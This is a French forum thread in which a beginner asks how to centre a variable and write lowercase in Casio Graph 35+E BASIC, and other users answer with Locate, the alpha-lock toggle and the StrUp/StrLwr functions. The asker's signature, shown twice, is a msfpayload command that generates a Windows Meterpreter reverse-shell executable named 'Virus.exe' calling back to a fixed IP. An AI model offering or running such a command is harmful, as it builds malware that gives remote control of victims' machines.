Partage
  • Partager sur Facebook
  • Partager sur Twitter

Casio Graph 35 +e programmation basic

Sujet résolu
    7 août 2020 à 12:20:25

    Bonjour je viens de commencer la programmation en basic sur ma casio graph 35+e et j'ai deux question, de un je sais que l'on peut centrer le texte avec locate mais comment peut on centrer une variable ?

    exemple, je demande l'age a l'utilisateur, je le rentre et la variable s'affiche en haut a gauche ou a droite je ne sais plus a lors que le texte pour dire: l'age est égal à .... est au milieu...

    deuxieme question... comment peut on mettre en minuscule ? si on peux evidemment...

    • Partager sur Facebook
    • Partager sur Twitter

    msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

      7 août 2020 à 14:09:11

      Bonjour,

      Tu peux centrer ta variable avec Locate aussi, en remplacant le texte par la variable:

      Locate 10, 1, X

      plus d'info ici

      et pour écrire en minuscule, le plus simple est d'abord de verouiller l'alpha (SHIFT + ALPHA) et d'appuyer sur F5 (je crois?) dans la barre de menu principale tu verras une possibilité [A <=> a] en fond blanc puisqu'il ne s'agit pas d'un sous-menu

      A+

      -
      Edité par WexyR 7 août 2020 à 14:11:06

      • Partager sur Facebook
      • Partager sur Twitter
      Si je suis tête en l'air, c'est par habitude de viser le sommet
        7 août 2020 à 15:15:20

        merci beaucoup ca fontionne : )
        • Partager sur Facebook
        • Partager sur Twitter

        msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

          18 août 2020 à 11:40:53

          il y a des fonctions aussi pour forcer en minuscule ou majusucle => StrUp et StrLwr (cf https://www.planet-casio.com/Fr/programmation/string2.php)
          • Partager sur Facebook
          • Partager sur Twitter

          Casio Graph 35 +e programmation basic

          × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
          × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
          • Editeur
          • Markdown